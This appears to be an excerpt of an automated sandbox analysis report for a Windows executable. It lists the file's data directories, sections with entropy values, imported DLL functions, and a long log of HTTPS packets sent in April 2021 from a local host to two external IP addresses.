IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xdcb1c	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xe0000	0x77ac	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe8000	0xa48	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xc8e50	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc9000	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xc8eb0	0x138	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb2000	0x760	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb0d5c	0xb0e00	False	0.434405366608	DOS executable (COM)	6.4345330049	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xb2000	0x2c2fc	0x2c400	False	0.358072916667	data	5.7249483767	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xdf000	0xd58	0x400	False	0.169921875	data	1.46939127782	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.pdata	0xe0000	0x77ac	0x7800	False	0.494303385417	data	5.97947229877	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe8000	0xa48	0xc00	False	0.524088541667	data	5.05165713943	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
bcrypt.dll	BCryptGenRandom
WS2_32.dll	send, recv, getaddrinfo, getsockname, listen, bind, freeaddrinfo, setsockopt, WSAIoctl, closesocket, WSASocketW, select, getsockopt, accept, htons, ntohs, socket, WSASetLastError, WSAStartup, WSACleanup, htonl, getpeername, __WSAFDIsSet, ioctlsocket, connect, WSAGetLastError
CRYPT32.dll	CertGetCertificateChain, CertFreeCertificateChainEngine, CertCreateCertificateChainEngine, CryptQueryObject, CertGetNameStringA, CertFindExtension, CryptDecodeObjectEx, CertFindCertificateInStore, CertFreeCertificateChain, CertEnumCertificatesInStore, CertAddCertificateContextToStore, PFXImportCertStore, CertOpenStore, CertCloseStore, CertGetEnhancedKeyUsage, CertFreeCertificateContext, CertDuplicateCertificateContext, CryptStringToBinaryA
ADVAPI32.dll	CryptGenRandom, SystemFunction036, CryptDestroyHash, CryptHashData, CryptCreateHash, GetUserNameW, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextA
KERNEL32.dll	HeapFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, AddVectoredExceptionHandler, CreateMutexA, GetStdHandle, FindNextFileW, CreateFileW, DeviceIoControl, FindFirstFileW, DeleteFileW, CopyFileExW, CancelIo, GetModuleFileNameW, CreateProcessW, CreateNamedPipeW, CreateThread, HeapAlloc, GetSystemTimeAsFileTime, GetConsoleMode, WriteConsoleW, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetProcessHeap, GetFileInformationByHandle, GetModuleHandleW, GetProcAddress, SetHandleInformation, GetCurrentProcessId, GetLastError, SetLastError, FormatMessageW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, SleepEx, QueryPerformanceFrequency, GetSystemDirectoryA, FreeLibrary, GetModuleHandleA, LoadLibraryA, QueryPerformanceCounter, GetTickCount, Sleep, MultiByteToWideChar, MoveFileExA, CloseHandle, WaitForSingleObjectEx, GetEnvironmentVariableA, VerSetConditionMask, VerifyVersionInfoA, CreateFileA, GetFileSizeEx, ReadFile, InitializeCriticalSection, ReleaseMutex, FindClose, FreeEnvironmentStringsW, GetCurrentProcess, GetCurrentThread, RtlCaptureContext, RtlLookupFunctionEntry, GetCurrentDirectoryW, GetEnvironmentStringsW, GetEnvironmentVariableW, WriteFile, DuplicateHandle, WaitForSingleObject, GetExitCodeProcess, TerminateProcess, CreateEventW, WaitForMultipleObjects, GetOverlappedResult
VCRUNTIME140.dll	__C_specific_handler, _CxxThrowException, memchr, strstr, __current_exception, strchr, memset, memmove, memcpy, memcmp, __CxxFrameHandler3, strrchr, __current_exception_context
api-ms-win-crt-math-l1-1-0.dll	__setusermatherr
api-ms-win-crt-heap-l1-1-0.dll	calloc, malloc, free, _set_new_mode, realloc
api-ms-win-crt-stdio-l1-1-0.dll	fread, _set_fmode, fwrite, _lseeki64, fseek, __acrt_iob_func, _read, fgets, fopen, fflush, __p__commode, __stdio_common_vsprintf, fputc, fclose, fputs, ftell, _open, _close, _write, __stdio_common_vsscanf, feof
api-ms-win-crt-convert-l1-1-0.dll	atoi, strtoul, strtol, strtoll, wcstombs
api-ms-win-crt-runtime-l1-1-0.dll	_register_onexit_function, _initialize_onexit_table, __sys_nerr, strerror, _errno, _crt_atexit, _register_thread_local_exe_atexit_callback, _c_exit, _beginthreadex, _cexit, __p___argv, terminate, __p___argc, _exit, exit, _initterm_e, _seh_filter_exe, _set_app_type, _configure_narrow_argv, _initialize_narrow_environment, _get_initial_narrow_environment, _initterm
api-ms-win-crt-string-l1-1-0.dll	strspn, tolower, strpbrk, isupper, _strdup, strncmp, strcspn, strcmp, strncpy, strlen
api-ms-win-crt-time-l1-1-0.dll	_gmtime64, _time64
api-ms-win-crt-utility-l1-1-0.dll	qsort
api-ms-win-crt-filesystem-l1-1-0.dll	_access, _stat64, _fstat64, _unlink
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 11, 2021 12:57:01.252619028 CEST	49748	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.261152983 CEST	49749	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.275437117 CEST	443	49748	88.99.66.31	192.168.2.4
Apr 11, 2021 12:57:01.278769970 CEST	49748	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.284833908 CEST	443	49749	88.99.66.31	192.168.2.4
Apr 11, 2021 12:57:01.286766052 CEST	49749	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.331262112 CEST	49748	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.338123083 CEST	49749	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.353804111 CEST	443	49748	88.99.66.31	192.168.2.4
Apr 11, 2021 12:57:01.355089903 CEST	443	49748	88.99.66.31	192.168.2.4
Apr 11, 2021 12:57:01.355132103 CEST	443	49748	88.99.66.31	192.168.2.4
Apr 11, 2021 12:57:01.355161905 CEST	443	49748	88.99.66.31	192.168.2.4
Apr 11, 2021 12:57:01.355196953 CEST	49748	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.355233908 CEST	49748	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.355240107 CEST	49748	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.360225916 CEST	443	49749	88.99.66.31	192.168.2.4
Apr 11, 2021 12:57:01.361095905 CEST	443	49749	88.99.66.31	192.168.2.4
Apr 11, 2021 12:57:01.361136913 CEST	443	49749	88.99.66.31	192.168.2.4
Apr 11, 2021 12:57:01.361166000 CEST	443	49749	88.99.66.31	192.168.2.4
Apr 11, 2021 12:57:01.361188889 CEST	49749	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.361211061 CEST	49749	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.361231089 CEST	49749	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.394640923 CEST	49748	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.399548054 CEST	49748	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.399571896 CEST	49748	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.404966116 CEST	49749	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.406615019 CEST	49749	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.417908907 CEST	443	49748	88.99.66.31	192.168.2.4
Apr 11, 2021 12:57:01.417943001 CEST	443	49748	88.99.66.31	192.168.2.4
Apr 11, 2021 12:57:01.418029070 CEST	49748	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.418061018 CEST	49748	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.419089079 CEST	49748	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.422204018 CEST	443	49748	88.99.66.31	192.168.2.4
Apr 11, 2021 12:57:01.422328949 CEST	443	49748	88.99.66.31	192.168.2.4
Apr 11, 2021 12:57:01.422549009 CEST	49748	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.428422928 CEST	443	49749	88.99.66.31	192.168.2.4
Apr 11, 2021 12:57:01.428452969 CEST	443	49749	88.99.66.31	192.168.2.4
Apr 11, 2021 12:57:01.428528070 CEST	49749	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.428549051 CEST	49749	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.429197073 CEST	49749	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.429357052 CEST	443	49749	88.99.66.31	192.168.2.4
Apr 11, 2021 12:57:01.429425001 CEST	49749	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.431937933 CEST	443	49748	88.99.66.31	192.168.2.4
Apr 11, 2021 12:57:01.432018995 CEST	49748	443	192.168.2.4	88.99.66.31
Apr 11, 2021 12:57:01.480031013 CEST	443	49748	88.99.66.31	192.168.2.4
Apr 11, 2021 12:57:01.488020897 CEST	443	49749	88.99.66.31	192.168.2.4
Apr 11, 2021 12:57:01.516036987 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.516134024 CEST	49751	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.543124914 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.543154001 CEST	443	49751	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.543240070 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.543272972 CEST	49751	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.543984890 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.544584036 CEST	49751	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.571225882 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.571381092 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.571424007 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.571460009 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.571465969 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.571485996 CEST	443	49751	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.571507931 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.571512938 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.572077036 CEST	443	49751	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.572160006 CEST	49751	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.572195053 CEST	443	49751	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.572228909 CEST	443	49751	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.572258949 CEST	49751	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.572280884 CEST	49751	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.582369089 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.582915068 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.583205938 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.589724064 CEST	49751	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.590061903 CEST	49751	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.609683990 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.609715939 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.609767914 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.609797955 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.610479116 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.610625982 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.610696077 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.612737894 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.612777948 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.612816095 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.612816095 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.612831116 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.612854004 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.612869978 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.612891912 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.612910986 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.612930059 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.612945080 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.612968922 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.612983942 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.613007069 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.613023043 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.613059044 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.614875078 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.614938974 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.614962101 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.615017891 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.617002010 CEST	443	49751	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.617031097 CEST	443	49751	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.617091894 CEST	49751	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.617163897 CEST	49751	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.617780924 CEST	49751	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.637140036 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.637181997 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.637214899 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.637218952 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.637238026 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.637258053 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.637278080 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.637321949 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.637619972 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.637660027 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.637744904 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.637790918 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.640211105 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.640255928 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.640280962 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.640347958 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.640412092 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.640476942 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.640517950 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.640567064 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.640583038 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.640609026 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.640625954 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.640666008 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.642554045 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.642596960 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.642627001 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.642654896 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.644560099 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.644599915 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.644646883 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.644673109 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.646548033 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.646590948 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.646622896 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.646651030 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.648688078 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.648725986 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.648762941 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.648789883 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.650671005 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.650715113 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.650739908 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.650767088 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.652548075 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.652586937 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.652609110 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.652642012 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.654503107 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.654545069 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.654762030 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.664808989 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.664874077 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.664884090 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.664932966 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.665817022 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.665855885 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.665896893 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.665923119 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.666985035 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.667066097 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.667133093 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.667193890 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.668353081 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.668395042 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.668422937 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.668457985 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.669740915 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.669790030 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.669888973 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.670752048 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.670794964 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.670856953 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.671993971 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.672035933 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.672053099 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.672091007 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.672099113 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.673151016 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.673192978 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.673223972 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.673252106 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.674257994 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.674294949 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.674335957 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.674360991 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.675348043 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.675396919 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.675421953 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.675446987 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.676589966 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.676630974 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.676677942 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.676703930 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.677669048 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.677709103 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.677752972 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.677778006 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.678841114 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.678915024 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.678970098 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.679009914 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.679033041 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.679048061 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.679063082 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.679106951 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.680037975 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.680078030 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.680113077 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.680151939 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.681034088 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.681077003 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.681103945 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.681127071 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.682252884 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.682291985 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.682327032 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.682353020 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.683475971 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.683520079 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.683552980 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.683573961 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.684634924 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.684676886 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.684719086 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.684742928 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.685676098 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.685719967 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.685741901 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.685767889 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.686856985 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.686898947 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.686935902 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.686959028 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.688072920 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.688122034 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.688155890 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.688189030 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.689090014 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.689131975 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.689172029 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.689196110 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.690221071 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.690263033 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.690309048 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.690327883 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.691441059 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.691483021 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.691519022 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.691519976 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.691534996 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.691560030 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.691577911 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.691586018 CEST	443	49751	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.691612959 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.693331957 CEST	443	49750	91.198.174.208	192.168.2.4
